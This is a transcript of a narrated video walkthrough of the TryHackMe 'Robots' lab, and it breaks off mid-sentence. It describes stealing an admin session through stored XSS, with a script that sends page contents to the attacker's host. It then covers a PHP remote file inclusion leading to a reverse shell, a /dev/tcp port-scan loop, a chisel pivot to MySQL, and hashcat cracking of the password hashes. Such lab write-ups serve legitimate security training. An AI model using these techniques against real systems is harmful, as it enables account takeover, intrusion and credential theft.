Greetings everyone, I'm Perumal Jagan. I feel good to catch you all after a long break. In today's video, I'm going to solve a TryHackMe machine. It's a hard TryHackMe machine, so I'm going to spend a while to solve this challenge. So stick with me. I'll be solving an interesting machine today. So without further ado, let's start. Now you are seeing the TryHackMe room that I'm talking about, robots. A small tribute to Isaac Asimov, a robotic scientist. And you can see the difficulty is hard, as I said, and the estimated time to complete it is around 120 minutes. So it's going to be a long video, so but it will be interesting. Okay, so let's see. I have already started this machine. You can see I got the IP address as well. Now let me go and start my session. I have already created this directory to put all the files related to this challenge, and let me start this tmux session for this challenge. So I have started tmux session, and in this pane I'm going to start my OpenVPN. So I'm connecting my TryHackMe OpenVPN to access that machine. Initialization sequence completed. That means I connected to TryHackMe network, and you can see I got the TryHackMe network's IP address turn 0. Fine. I already copied that IP address and I'm able to ping that target machine. I'm able to ping successfully, and from TTL value I could see this machine is around 4 hops away. By default it's a Linux machine, so it will be having the default TTL value of 64, but I'm seeing 60 here. That means my target machine is around 4 hops away. Okay, 3 hops away. Fine. I think that's the takeaway from this ping results. The first step that we need to do is to run the Nmap scan on this target machine. I already ran the Nmap scan, so let me show that results to you. So here is the result, and you can see there are 4 ports open, and you can see 997 closed ports. The port 22 SSH, a typical one, and port 80, it's a web application, Apache web server, and I can see the TTL is 59. Here the SSH is 60 and Apache is 59. That means it might be running on a container. That's what it indicates, the TTL value. So actually I have used hyphen VV to find this TTL value. So you can use that flag if you need while running Nmap scan. It will be very useful. And in port 80 I can see the supported HTTP methods, robots.txt, and I can see 3 disallowed entries in that robots.txt. So I can access this one and see this disallowed entries. That means I think I can access these paths, I guess. Port 9000, it is running another web application. It is again running on Apache, but a different version, and this banner says it's an Ubuntu machine. Yeah, I think that's it, nothing much. And I can see here the domain name robots.thm. Okay, so first of all let's try to access this default port 80. Let's see. It says forbidden, and this forbidden message belongs to Apache, and it says Debian. You can see this port 9000, it says Ubuntu, but this port 80 says Debian. Let me press Ctrl Shift I, and I'm opening network tab and reloading this page just to see the request and response header. In request header, in response header I'm seeing it's Apache and Debian, and in request header, yeah, nothing special, just user agent and couple of generic request headers. Fine. I go to storage. Do I have any cookies here? No. And Vaplizer, and it spots it's Apache HTTP, and it is a Debian machine. All right, let me go and access port 9000. It simply displays the default Apache web page, and the banner says it's an Ubuntu machine. So let's see. It's a default page, nothing special in this page. I go here, reload this. Once again, I will check what I'm getting. It says nothing. Literally, I don't have any significant info here. Probably I'll go and turn on Bob Suite. Interceptor is on. So let me reload this. So here is the request. I forward it to repeater. Okay. I forward it and I'm getting the response. It's a default Ubuntu page. All right. So let me go and access a page that doesn't exist. Let's see. I'm just putting some random characters, and you can see again it says it's not found. That's fine. Probably we can run directory scanning on this, but I knew I'm not going to get anything when I do directory scan in this web page. So since I solved this machine already, so I'm directly going to the content, and it is, you can see it is forbidden. It is not exist, it is forbidden. And I'm putting some random characters. It says no response received from remote server. Some weird burp error. Let me turn this off. Not found. Yeah, it says not found. So typical Apache 404 error. Fine. So in Nmap scan, I have seen the existence of robots.txt. So let me try accessing that page, robots.txt. This one says 3 disallowed entries. So let me access these entries one by one. I go to the first one, harming humans. Again, it says forbidden. So I don't have permission to access this source. That's fine. I go to the next one. I think it is there in this page itself. Ignoring human orders. Okay, I go and type this. Ignoring forbidden human orders. So that means this page exists, but it is not allowing us to see. It's forbidden. That's what it means. Then there is a third page, harm to self. So let's try to access that as well. I try accessing harm, forbidden, to forbidden. Let me add the word self and look at the results. I'm getting we cannot connect to the server at robots.thm, and you can see the URL changed. That means it is trying to redirect my request to robots.thm, and that's what it means. So let me show it with help of burp. Interceptor is on. I'm going to access this harm to self, and here it is. I'm going to repeater. When I forward this, I'm getting 302 not found, and it is forwarding it to the location robots.thm. When I follow the redirection, it is actually accessing robots.thm now, and I'm sending this. Hopefully I'll be getting the response to that page. No, I won't get, because I need to add the host entry here. So let's do the same. I simply turn this off. Let me go and access the etc host page. So I'm adding host entry in this file. My bad. All right. I go here. The IP address would be 10.10.109.149. 10.10.109.149. All right. Fine. And the URL would be robots.thm. All right. Fine. Now I will try to access this page. Hopefully I'll get a different results this time, and you can see the results here. It says recruitment campaign, register here and login. And here is a hint: an admin monitors new user. So whenever a new user getting registered, the admin is actually monitoring them. And here is a potential username. It's admin. So let's go and register ourselves and try this. Okay, an admin monitors new user. Again, a hint: your initial password will be MD5 of username plus date of birth and month. So it is actually malicious. It is not a malicious. It is actually a vulnerable approach to store a password. Uh, the stuff itself is highly vulnerable because MD5 is obsolete. Apart from that, since it is simply encoding username concatenated with the date of birth with just date and month, it is highly susceptible to brute forcing attacks. So let's try. Let me try my name here. I'm just putting my name and putting some random date. I'm opening Burp Suite here in parallel. Sorry, not Burp Suite. CyberChef. I'm opening CyberChef here in parallel. So let me register this user. Yeah, I have registered this user, and my login, my username would be Peru, and my password would be 0101. That is the date of birth I gave. The date 01, month 01, but it has to be MD5 encoded. So when I MD5 encode this string, that will be my password. And here is my password. Let me go and paste this, and I submit. When I submit, I'll be able to log in this. So this is how you should register yourself and log in this web page. Admin lost login. It also shows when the admin has logged in, and also that particular user's login session. It says logout.php, and look at this. This is actually revealing what is the framework it is running on, and you can see it is actually built on PHP language. It's a Debian machine and Apache HTTP server. I mean, since we have seen that port 80 is TTL was a little different, it was just one hop away, further away. So I think this Debian machine is actually a container. It is actually a container which is running on this particular target machine. All right, let's see. Apart from this, yeah, it says I have another link here, serverinfo.php. So let's go and access that page. When I go and access this server info PHP, it simply shows the PHP info page. We might get some interesting result in this. Let's see. I'm simply getting the system details. It again confirms it's actually running on a Docker container. So it's a Docker, obviously. And I'm scrolling down. Do I get anything else? Any interesting stuff? It says Apache version, which we know already, and the user is www data, which is expected. Apart from that, robots.php, thm, and here is a cookie. We are actually getting a cookie value. Let's note this down. I guess we are having a cookie value. Let's see. I'm pressing Control Shift I, going to storage, and here I'm seeing a cookie value. A cookie value for our current session. We already logged in. So for this session, this is the cookie value: SM2 PST 9CU9U10 101 EAT. So this is the cookie value, and it looks similar. Both are same. You can see both the cookies are same. So what I can understand, this serverinfo.php page is actually having our current session cookie. Whoever logs in that web page, they'll be able to see their own cookie in this page. They'll be able to see their session cookie in this page. So that's what it means. I'm scrolling down. I don't get any other interesting info here. No blocked method, nothing. So I mean, the block method is empty here. Let's see. Can I see block or restricted or method? Let's see method. Not a method, maybe function. here in usually in PHP page we will be getting the functions that are disabled. So it will be helpful for us to do the code execution. When we found a code execution, if we find any denied methods, maybe we can try some different methods. So that's what the use of that. Okay, we don't see anything interesting here. So what I'm going to do is probably what I can do. I know there is a user called admin. I can simply do like this. Let me explain this. Yeah, I can simply do like this: admin 0101, admin 0102. Like that, I can try to brute force. You can see the date, month, and I know the username already. Since it is actually following a poor approach to encode and store the password, the initial password, I might simply try to brute force the last 4 digits, and I can just convert it into MD5 hash, and I can try against this web application to log in as admin. But since I already solved this machine, I knew it's not gonna work. It's not gonna work because it is just an initial password. You can see here is the hint. Your initial password will be MD5 of username plus date, month. Since the machine is with hard difficulty, I don't think this is gonna work because the admin must have changed their initial password to something else. So in this case, what we can try? Maybe we can try to steal the cookie. Is it possible? Is it possible to steal the cookie? Let's see. 01. Oh, sorry. I think I need to log in. I already registered. Let's see. I log in. 01. Oh, sorry. I go here to CyberChef. I already made this MD5 hash. So let me open this. Yeah, you can see my second login time as well. Okay, now I'm seeing the cookie value here, and I'm going to check whether I'm able to steal this cookie through cross-site scripting kind of attack. For that, we need to check this HTTP only cookie, only parameter, and it is actually set to true. That means we cannot steal the cookie of another session, maybe admin session. So what we can do, since HTTP only is set to true, the cookie stealing from this place is not possible. However, we can see this particular page, server info, is actually leaking the cookie value. We have already seen that a while ago. It is actually leaking the same cookie value. So why don't we try and read this particular server info page of admin session? Why don't we try that? I think that is what I'm going to try. That will be our initial foothold. Let's try to do that. And in order to perform this, first of all, I need to check whether I'm having any cross-site scripting. Whether it is vulnerable to cross-site scripting, because I can form a JavaScript code that is going to steal me the admin cookie from server info page. However, I need to test where we can inject that particular JavaScript code. I need to test that part. So let me do that. For that, what I'm going to do, I'm going to test for simple cross-site scripting. So let me enable listener 9001. I'm listening on 9001. So let's go to this register page. So here in this page, I can give the date only in this particular format. So I'm not going to put my JavaScript here. Instead, I'll try to put my JavaScript in this username tab. So let's try that. Probably I'll go here. I'll build a simple a script. Let's see. And I'm giving my IP 10.17.22.235 9001. I'm listening on this particular port, right? So let's see. Oh, sorry. So this must be perfect. This must be a perfect payload. Let's see. I'm copying this and I'm going to put this payload here, and I'll give some random date. This time I give 221234. Uh, I know I'm listening on port 9001 and I registered. Let's see. I need to wait for a while, I guess. Maybe I need to log in. Let's see. Password should be 0202. When I encode this, I'm getting this one as a password. So let me give this. Now, and you can see I got the hit from our destination. It says, okay, nothing interesting from the header. All right, but I'm getting the hit, which indicates this particular register page is having a cross-site scripting vulnerability. This particular username box is vulnerable to cross-site scripting. So we can inject our JavaScript payload here to steal the admin cookie. Okay, so let's do that. For that, I need to write a specific JavaScript code. So let me write that code for you. I'll save this as probably grabber.js, since it is going to steal, grab the cookie of admin. Okay, so let me do that. So I'll be defining the URL first. Const target URL. So let me mention the target URL first. The target URL must be the URL of the server info page. And I know there is a page. Let me go to the history. Okay, I think I don't see it here. Sorry. Harm to self. Robots.thm. Robot.thm. Says not found. What happened? The machine is running. Forbidden. Harm to self. Yeah. I log in. Peru. Probably I'll go here and change this again. It cooked. I got the MD5 value. Submitting it. I logged in. And I need to see the URL of this particular page. So let's get this URL. So this will be my URL, the target URL, because I'm going to grab this particular page of admin session. So that will be my objective, and the target to maybe the URL I will say const this autofill const URL equal to, this will be my URL, because once the page is stolen, it will be sending that response to us. So I'll be mentioning my IP address here, 235. Probably I'll be listening on again the port 9001. Let's see. I'll mention, for example, I'll simply mentioning cookie here. Okay, let's see. Then I'm defining the function to send the HTTP request in this JavaScript. So it will be XML HTTP request. Yeah, it is getting the autofill here. I'm also opening that particular web session. It will be a GET request, and I'll be sending the request to target, not URL. I'll be sending request to target, and I'm setting true. Let me check what is the what this true means. Let's see. I'll go and access ChatGPT to query this. Mean in JavaScript XML HTTP request. Instance of HTTP XML HTTP request. Open method will be get. The target will be URL. Async initializes the request with. Okay. whether the request should be asynchronous or synchronous. True is set for asynchronous mode. The script continues running while the request is processed in the background. Okay, so the true means asynchronous, false means synchronous. So the request will be processed while, uh, the script will be running at the back end while the request is processed. So that's what it means. Okay, so let me go and do the next step. I think on ready state change. Yeah, that's what the method is, on ready state change function. So I'll write this code. At the end we will learn what it does exactly. Okay, I'm writing a if function here, and here http, I think this is fine. http ready state 4, http state is equal to 400. If we are getting the successful response, then what we need to do, then probably we might need to we might need to print this. But in our case, we will be, once the script successfully able to access this page to be sent to our attacker URL, right? So for that, what I'm going to do, I'm going to change this particular part, and I'll be using a method called fetch to send the HTTP request, which is another method, and this will be URL here. And apart from that, what I can do, probably, yeah, let me concatenate this URL. I'm concatenating it with let's see, question mark, then then B2A is actually to base 64 encode this response. I think it makes sense right now. Okay, this looks fine. Then what else? I think I should be wait a second. Yeah, I think I need to close this stuff, then HTTP send. Yeah, this is what I need to mention. Fine, so let's see what it is actually doing. Let's ask ChatGPT to explain this as well. The function assigned to http.onReady state change, meaning it will be triggered whenever ready state of HTML request object changes. This sets up an event handler that runs whenever the state of XML HTTP request changes. Ready state equal to 4 and HTTP 200 ensures the request is completed, and this ensures the server responded properly. So the 4 means the request is properly sent, and 200 means we know it's okay response. Fine. If both the conditions are met, the following code will execute. That means the code to send the response to the attacker machine. So that will be initiated. All right. I think this looks fine right now. We are good to go. Now, what we need to do? Actually, we need to execute this particular grabber.js. We means not we. Actually, the admin has to execute this JavaScript code. Then only it will be able to steal this cookie, or it will be able to steal this page and send it to us. So what we can do? In this case, probably we can go to this, where is the page? Did I close this page? Yeah, I think I closed it. Okay. Probably what we can do, we can put this whole JavaScript code here and wait for the response. But I'm not going to do, because I won't get, because you can see there are various line breaks and special characters. This script might break this process. So what I can do, probably I can put put it in grabber.js. I already put it in grabber.js. Maybe I can serve this grabber.js in a web server, and I can simply put a one line here that will request my web server, and it will grab the grabber.js. Okay, so that's what I'm going to try right now. Let's see. Python 3 -m http dot server. So is it having grabber.js? Yes, it is. So let me start the web server. Python 3 -m http dot server. Okay, now it is serving on port 8000. We can go and initiate another listener on 9001. This is where we will be getting our page. Okay, fine. So we actually need to grab this grabber.js. So for that, I'll be writing another simple one-liner JavaScript script src, the same one that we used to test our JavaScript, the cross-site scripting vulnerability. So let's see, 10, 17, 22, 235, port 8000, and this will be grabbing grabber.js. Okay, so this will be the page. This will be the script. So I'm copying the script. So nothing, no error. I go here and register this. This time I'm using 0303 1234. Okay, I go here and submit the query. Hopefully I'll be able to see. So when admin logs in, I'll be getting the hit here as well as the hit here. I already got a hit, but I didn't receive any cookie here in this session, so I'm expecting to get that. First of all, I need to get a hit here. So let's wait for that. Probably, what if I try to log in? I go here 0303. Let's see. I log in. This password. Let's see. Now I logged in and I got a request. Here I had to get this cookie. Let's see. But here the thing is, we logged in this particular session. So probably this time it is going to steal only our cookie. It is going to get our cookie only. Since we already know this one, I'm not going to give importance to it. I'm gonna wait for a while and get the cookie of admin. Let's see. I'm gonna pause this video. So once I get the hit, I'll resume. Now look at this. I got the hit. Seems like I got the cookie. So let's see. Let's try to grab this. Let me go to the top of the cookie. Yeah, here press space and I'm selecting everything. I need to decode this from base 64. Then I will get that PHP output. When I store this file and open it in a browser, I'll be able to see that cookie part in that PHP info page. So let's do that. I guess this cookie will be my session cookie. It won't be the admin cookie. That's what I suspect. Let's see. Because we logged in that page as well, so it executed in our session and it grabbed that that particular server info page from our session. So that is also possible. Let's wait. I simply copy this in system clipboard, xclip selection clipboard. Yeah, I copied it. So let me go to this cyberchef. What I can do, maybe I can duplicate this. Yeah, new session would be good. Disabling this from base 64. Now I got that PHP page. So let me save the output to a file. server info.php. Sorry, not PHP, HTML. Yeah, I'm saving it here. So let me go and open it. Firefox server info.html, and look at this page. I see the cookie here. SM2PST star ends with 60. I think this is our cookie. Yeah, SM2PST 60. This is our cookie. So I don't want this one. I want a different thing. So let's wait. Let's wait for the uh, page to hit with the correct cookie. So let's see. I think I need to start this listener again. 9001, and it is still listening, and you can see multiple HTTP requests sent, because periodically the admin logs in the page. So whenever the admin logs in, the payload will be triggered. So that's why I'm gonna wait for a while, and let's pause this video and I'll unpause once I received it. Okay, I keep getting the same user cookie, not the admin cookie. So user cookie, as I said, it typically ends with TBD4. That's the user cookie. I keep getting the same cookie, but I'm expecting something else, which is admin cookie. So which is I'm not getting. I'm not positive what is happening, because I could see the time is not changed. It is still 541 the same time. It's not changing at all. So probably I'll pause this video for a while. Maybe I can reset this machine and start this again, and I'll try to grab the admin cookie and get back. Now you can see I logged in. I actually reset this machine and I registered a new user and I logged in. Admin is yet to log in, but I logged in. So for that session, it grabbed that particular script that we are serving, and also it spitted out our own cookie. So if I decrypt, I'll be getting nothing but my cookie. Okay, so this is what I'll be getting. So I'm not going to do that. I'm gonna wait again to receive the admin cookie. For that, admin has to log in. So let me wait for that. Okay, I think I received the cookie. So I think this is the cookie that I'm looking for. It ends with PG equal. Let's see. I go and check the previous cookie that I received. I hope I have received that. Look at this. It ends with TBD4, but unlike this particular PG equal, I think this is what the cookie that I want. So let's see. I think we have grabbed the cookie. I'm gonna go and copy this. Let's see. The previous instance of cookie. Yeah. So this is what the cookie that I need. Let's see. Okay. I copy the whole thing and I decode it. Since it base64 encoded the whole web page, I'm getting a huge base64 string. So the reset worked. I reset the machine. Eventually I got the admin cookie. Previously I was not receiving it. Okay, yeah, this is the cookie that I'm looking for. Okay, let me put it in a system clipboard. Yeah, xclip selection clipboard. That's fine. Okay, I go here and I paste this. I save this in server info.html. Yeah, I replace it. Okay, now I replaced it. Let me go and open that file in Firefox. Firefox server info. Yeah, look at this. Here I will be able to see a different cookie. a cookie that is different. Yeah, 3R60. So hopefully I'm seeing a different one. Let's see. SM2 PST 9CU 9U1 3R60. No, this is not what I was expecting. So let me go and check here. Do I see a different cookie here? No. SM2 PST 9CU SM2 PST 9CU 9U1 3R60. Okay, I think this is not the cookie that I wanted. I think I lost it. I need to go and listen once again on this port 9001. Let's wait. I lost it. LVNP 9001. Let me decode this. Let's see. Okay, I go here. I leave this particular page as it is. So in a different page, I'll be decoding it. -n, yeah, pipe xclip selection clipboard. Okay, now I go here, paste it. Do I get a different key now? Let's see. PRT 9CU, I knew one of them EAT. Yeah. Different cookie. Let's see. Will it be this one? So until you get the correct cookie, you need to work this. So let me enable this listener. And I go here, -n, xclip selection clipboard. Done. Look at this. I think this is what I was missing. Now we got a different cookie. Hopefully after some struggle, we got the cookie that we need. So this is the cookie that I was looking for. Yeah, see, this cookie is totally different from our existing cookie. It is not the same. So let me go and replace this. Now I replace the cookie. What next? What should I access? Actually, we need to find a page to access here, right? So let me go here. I go to, probably I go here and look for some directory scanning. So I need to access some sensitive page here because I already grabbed the cookie. With this cookie, what else I can access? For example, since I got the admin cookie, probably I can try to access the admin page. I'm simply going to try replacing this with the word admin.php. Let's see. And here it is. We are getting something very interesting. So I didn't run the directory scanning before, but I should have run it. However, initially during your initial enumeration, when you're trying this machine, you can start doing the directory scanning. There is another page also, so I'm just showing this. Since I already solved this machine, I knew there is a page called config.php. That's what I'm doing right now. And I stole the cookie, and I could see the page admin.php is having some URL testing page. So let's try this. I'm gonna go and serve this. Sorry, probably I'll go here nc-lvnp 9001. Here I will going to give some request on port 9001 probably. So let's submit this. What I'm getting, and you can see it is actually sending request to us. It is looking for shell.php. Actually, when I was trying it for a last time, I tried this particular payload, and you can see since this particular file is not exist, the connection is closed, it is actually sending us an error message in this page. So this error message is vital. It is actually giving us the hint. Look at this. Whatever the URL we are giving, it is simply putting that URL in the include statement. In PHP, include statement without proper sanitization is very dangerous. So that's what it means, and you can see it includes any URL. There is no sanitation, so it is simply including any URL that user gives. So what we can do, probably with this we can try to do some file inclusion attacks. Probably maybe if I have a PHP script, since this application is running on PHP, I can simply put one PHP script, and when this PHP script included by this program, we might get a reverse shell. So let's try that. Probably I go here and try with a simple PHP script. Let's see. PHP, what I can give. Let's see. I go and prepare a simple PHP script. System, probably ID. Okay, so this is the sentence. So I'm simply giving who am I. So let's see what is going to happen. Okay, let's go and grab a PHP script from Google. PHP shell pentest monkey. So this is having a PHP reverse shell. So I go and grab this shell here. So before that, I store it as test.php. Okay. So I'll save it as test.php, and I go to this page where it is admin.php http. So instead shell I'll mention admin.php. So my web server is still running. So I'm gonna go and change this port to 8000, and instead shell.php, I'll be grabbing test.php. Let's see. Look at this. There is a code execution. So this is what I was looking for. I'm executing a system command, simple system command, and here it is going to read a file for me, passwd. So let me try to read this one instead. I go here and I'll give the same URL again, http, yeah, test.php. When I submit the query, and here it is, I'm able to read the etc passwd file, but it is truncated, I guess. Truncated? No, it is not. So it is giving www data. That's okay. I go here. So now we knew we have a code execution. So let's try to get the reverse shell from it. I go to raw and I simply copy this page. Probably I go here to this page, sublime text of shell.php. I'll be creating a shell.php. Okay, I go here and change the port, IP and port, 10 17 22 235, and the port would be 8001 probably this time. So I'll be listening on port 8001. So this will be getting me the reverse shell. Okay, now I got this shell.php. Let me go here to this page, where it is. Yeah, http shell.php. So I'm including the shell.php. So when I submit this, hopefully I'll see the reverse shell here. Okay, I submitted. Seems it is still swinging, so it's a good sign. Yeah, I got the shell. You can see I got the shell as www data. Do I have Python 3 here? And we knew it's a Docker container, so we'll be having only limited resources. So with that, we will be escalating this shell, stabilizing this shell, dev null -c bash. So this is another command to get the stable shell. So I'm using script since Python 3 is not found. Okay, now I got this, and still I'm having only limited functionalities. Export term equal to xterm. So that's what I need to do. Term equal to xterm. Yeah. Let's see. I'm actually in. I go and execute ls-la. Yeah. Since it is a Docker environment, I'll be having only the limited resources. So I knew this application, this particular www data is running the web application. So whenever I'm logging in as www data, I will be looking all the files related to the web application, right? So you can see here, earlier I tried to access config.php, but now since I got the shell, I'm gonna go and try accessing that config.php page because it might contain some critical configuration data. So let's see. HTML, yeah, harm to self, that's the page. But earlier I was not able to access that other directories like harming. It was forbidden, if you remember. So let me go and access those pages as well. Will I get any sensitive info? Let's see. cdls. Okay, sorry, no files here. Git keep, there is a file, but it has nothing. Then ignoring human orders. Okay, it has nothing. Now harm to self. Harm to self. I go to this page, and this is where I'm having all the pages related to that web app. So here I knew the register, login, index, logout, server info, admin. Now let me open this admin briefly and show what is causing that vulnerability, because we were able to include any URL. So this is actually kind of a remote file inclusion. So let me go here and I'll show you what is causing the issue. You can see it is actually including config.php again, but you can see whatever the URL is posted in this page, it is simply including that page. So this include function in PHP without proper sanitization is vulnerable, is causing harm. That's what we knew. Okay, now let me go and check this config page, config.php. Now we are in a Docker container, so we are having only limited privilege. And look at this config.php. Here we are having some sensitive data. Okay, so let me go and paste this data somewhere here. What I can do, I can simply create a file called notes, probably notes.md. Yeah, notes.md. Okay, sorry. vi notes.m, no, it's probably nano notes.md. Okay, okay, I think I should be able to copy this to my system clipboard. Okay, pipe xclip selection clipboard. I need to copy this data, that's why I'm doing all these things. Okay, now I copied the data and you can see the server name is db, username robots, password is this one. So this is the database password. And is there any database running on this system? ss-lntp. Let's see. lntp. ss command is not found. But let me see. ps-ef. Here, do I see any database? I don't think I am seeing any database here. It's simply running an Apache apart from our shell. So I don't see database here. Since it is a Docker container, the web app is running on this Docker container. The database must be running on some other Docker container. So let's see how we can find that. So I will see the host entry of this machine. Do I see anything else? So looks like, so this is the box. On this box, the web page is running, and you can see the IP address 172.18.0.4. So this is the IP of this container, I guess. Okay. Yeah, I think this is the IP of that container 172.18.0.4. But where the database is running, how we can find that? How we can find the other IPs in the network? There is there is a file here in Linux. So I go to proc net arp. So when you read this file, you will be able to see the other systems that was communicated in past, or that is being communicated from this current machine. So the current machine, the current container is communicating all these IPs, and you can see the ARP entries in this file 172.18.0.1.03.0.2. So we have 3 IPs. So since we have all the IPs present in this network, probably I can do one thing. I can write a simple bash one-liner that will be doing the port scan for me. So we know the SQL database, the mySQL database, which is running on port 3306. That's the default port. So I'm gonna go and check for port 3306 on all these host 01, 03, and 02. Okay, so let's try that. I'll be writing a bash script here. Let's see. Target 172.18.0.1. Okay, then I am terminating this line, and I'm going to for loop for port in and I'll be mentioning the range. 1 double dot to mention the range, 65536. So I'm going to check 65535 ports. Since I'm starting from 1, I'll be mentioning 5536. And I'll be doing echo, I'll be echoing dev TCP, and here I'll be mentioning the target IP, then port. Okay, now we will be doing the port scan through this dev TCP. Then here dev null. Yeah, let's see, I'm referring my notes here. Okay, now I'll be forwarding it to dev null. So is there any error? It will be forwarded to dev null. 2 ampersand, okay, not like this, like this. 2 greater than ampersand 1, and echo that port. So it will be echoing that port. Then done. So this will be my one-liner to perform this port scan. So it will be scanning all the ports on all the TCP ports on 172.18.0.1 host. So let's see what we will be getting here. I guess it is correct. For port in 162.1.5.35, terminating the line, do echo dev TCP target port, then forwarding it to dev null, then 2 greater than ampersand 1 ampersand echo port. Done. I think this is fine. Now it is scanning, and look at this, straight away we got 2 responses, port 22 and port 80. So when we see this response, we understood this particular IP 172.18.0.1 is actually nothing but our host. So it will be our host 10.10.214.227. Let's see. I think we won't get the 3306 here, because if it is running, then we would have get that 3306 on our Nmap scan itself, but we didn't get that. So it is not this machine. After this 2218, it will be responding. Yeah, 9000. This is what I was about to say. So 9000. So only 3 ports are open in this machine. So I need to run for the remaining 3 and 2 Docker containers. So it will take some time to finish this. Since I am in a restricted shell, I cannot press Ctrl+C or Ctrl+Z to terminate this. So I'm going to pause this video and get back once this scan is done. Okay, now I got the shell back. The scan is done. Since I already knew on which IP the database is running, I'll be wrong clipboard. Yeah. Okay, I think I cannot modify this. So let me go and put it here. Okay. I think I need to retype this. Let's do that. In fact, it will be helping me to, it will be helpful for me to memorize this. 2. So on that IP only the database is running. So I'm going to do it for port in 1.65536. Okay, I'm not gonna scan till 65536 because I need port 3306. So I'll be doing it till 3307 probably. Yeah, for port in, okay, like this. Then do echo dev TCP like this. Here I go and mention target, then port like this. Okay, then I'm closing this. I go here, dev null and here 2 greater than ampersand 1, then ampersand ampersand echo port. So whenever it is able to access this channel dev TCP, the particular IP and port, it will be echoing that port. It means it is valid, the port is open, so then it will echo that particular port, and that is how this command works. Okay, now I'm gonna wait for a while to finish, to get the results. And here it is, straight away we got the results and we got 3306. That means this is the IP that I'm going to look for. On this Docker container only the database is running. All right, now how we can access this particular stuff, because here I don't think we have, let's see, here I don't think we have MySQL. It is not found. So how we can access that? Maybe we can do one thing. We can try to pivot this Docker container, this particular port to our local machine, so that we will be able to access it from our local machine itself. So let's do that. And in order to do that, I need a chisel. Let's see, chisel GitHub. So I need this interesting tool. Let's go and go to releases. Yeah, here in releases I need it for Linux AMD GZ probably. Yeah, chisel Linux AMD 64 GZ. This is what I need. I download it, I save it. Okay, bash gunzip chisel. Yeah, now I got the tool. Yes, it is. Yeah, that's the program. And I change it to, I change the permission and I'm moving the chisel to simply chisel. Okay, now I have the tool. Now all I need to do is to transfer it to the target machine. So the already, whether do I have curl here? I do have curl. Awesome. Let me curl this tool to this machine. I think I don't have access here. Let's see. Curl http://1017.22.235 port 8000 chisel -o chisel. Failure out writing output to the destination. So I don't have a write privilege here. So let's do one thing. Curl http://1017.22.235 yeah, port 8000 chisel, and I'll be able to write it in temp directory, right? So let's do that. Temp chisel. Can I write it? Yeah, I'm able to write it in temp. So let me go to temp directory. Yeah, from here I'm going to temp directory, and here it is, ls-la chisel. Okay, I need to change the privilege. chmod +x chisel. It is done, I guess. ls-l chisel. Yeah, now it got the executable privilege. I'm running chisel here, but before that I need to start this chisel in this particular machine, on my base machine. Chisel server, I will be serving from here, so it will be like a reverse connection. Reverse -- port, I'll do 1818 or 0808 probably. Not 08, 1818. That will be better. Okay, ampersand to run it in the background. Server reverse port. Okay, now it is running. Let me go to this machine, and here I start this chisel and client. So it will be connecting to my server, and the server IP will be 1017.22.235 1818 port. Then on the what port that I'm going to forward, I'll be forwarding port 3306. Okay, and the IP address would be 172.18.0.2, because on that port only we found the 3306 open. So I'll be doing that 172.18.0.2, then 3306. So the port 3306 on this particular Docker container will be forwarded to my local host of 3306. Okay, so that's what it command command meant. Okay, let me run it in the background. I think everything is fine. Let me click it. Connected. Perfect. Awesome. So it is connected right now. I go here, start this new session. Here, if I go here, sorry, ss-lntp. Am I serving? Yes, I'm serving on port 3306. Awesome. MySQL -host 127.0.0.1 -u. What is the username and password? We already got it right. Robots is the username. And the password would be this particular stream. Okay, so it is asking the password. I'm pasting it. Awesome. Now I logged into the database. Let's see. Okay, show databases. That's the command. So we need to end this command with the semicolon. We have two databases. The database would be web actually. Look at this. So this is the database. So let me use web. All right. Now show tables. I have two tables, logins and users. So let me go grab the contents of the users table. So for that, I am selecting select all from users. And now I got the results. And look at this. I'm having three users. Admin is the admin user, of course. And there is another user called Regis Card. And there is a third username, which is actually the script that we registered. So let's see. We knew actually this is the username we gave, and also we know the password that, the database date of birth we gave. So let's see. We gave actually 0101. So this was the password 0f4572c. But here, if you see, it stored different hash 81ef and ends with 9f57. When I simply paste it and look at this, when I simply do another MD5 hash on this 0f45, I'm getting this hash 81ef and ends with 9f57. So 81ef 9f57. So what it is doing, the database, before it stores the password, whatever the password that already MD5 hashed, it is again MD5 hashing that. If you don't understand, let me tell it simply. MD5 of username plus date, month. This is the password actually. This is the format that password is. But when it is storing in the database, it is again MD5 hashing the whole content. It is again encoding it to MD5. So in this format only the password is getting stored. So I am simply informing this just to understand how this password is getting stored. It will be hopefully helping us to crack the password of the users Regis Card and admin. So what you can do probably, here you can write, there are a couple of ways here. You can either go and put this hash in a crack station and try to crack it. If it cracks, that's fine. If it is not cracking, then we can do one thing. We can write a script. In that script, we know the username here. For example, this is the username. We don't know the last 4 digits, and we need to brute force those last 4 digits, and we need to convert them into hash. Then we need to try it against application, and we can check whether the password. We can try to guess the password. Otherwise, what we can do, there is another way. We can simply use our hashcat utility to crack the password. So in this case, we can perform some masking attack. Since we don't know only that last 4 digit, we can perform the masking attack by using the hashcat to grab the password of this user. When we try to grab the admin password, we won't be able to get it because, as I said, the admin user has changed their initial password to something else, which is, the password hash is given here. So let me grab this hash for a while. I'm gonna go and open a new session, echo -n. I'm going to show this whether I'm able to crack this particular hash in crack station. So that's why I'm copying it to system clipboard. Sorry, clipboard. Now it is in my system clipboard. I go to crack station. If it is a simple MD5 hash, you can simply try it here. This will be your first place to test this. Crack hashes. No, it is unknown because the password is difficult. I guess the admin has changed their initial password. All right. Now we know we have this particular hash. So let me grab this. I go here and simply replace this hash. Okay, now I go to a file. I'm creating a file newly, and here I'm pasting the hash, hashes.txt. Okay, now I'm having this particular hash. I can simply use this hash to against hashcat to crack it. So let me go here to hashcat hash types. So I need to search the hash type, the example hashes. I go here and I search for MD5 because I need to know the mode, hash mode to apply. And you can see multiple hash modes here. Hash mode 0 denotes MD5, 10 denotes MD5, but I need something else. Let's see. Not this. Look at this. This is what I need because you can see the hash mode 2600, the format is MD5 of MD5 password. So as I informed you before, the password, that MD5 hash is once again MD5'd. So actually this format looks similar. So that's why I'm planning to use this particular mode while performing this mask attack. Let's see. Hashcat. I'm applying the hashes.txt -a equal to 3, I guess, to perform this mask attack, and -m should be 2600. And now I'll be mentioning the password. Password is nothing but this particular username followed by 4 random digits. That will be the date and month. So I'll be mentioning this one. Sorry, wrong clipboard. This one, and here D. So let me go here and check for the masking attacks. Hashcat mask attack. Yeah, if you go and see this page, you will be able to understand. So here, if you know only the partial password is unknown, you can perform this kind of masking attacks. And here -d denotes the digits 0 to 9. Okay, so this is the built-in char set. So that's why I mentioned the $D 4 times, because the 4 digits to be cracked. So that's why I mentioned this. Now I'll be running this. Let's see what it says. Okay, I think it is done. All possible hashes found. Use show to display them. And look at this. It cracked. It didn't take much time. It was quick, and you can see the 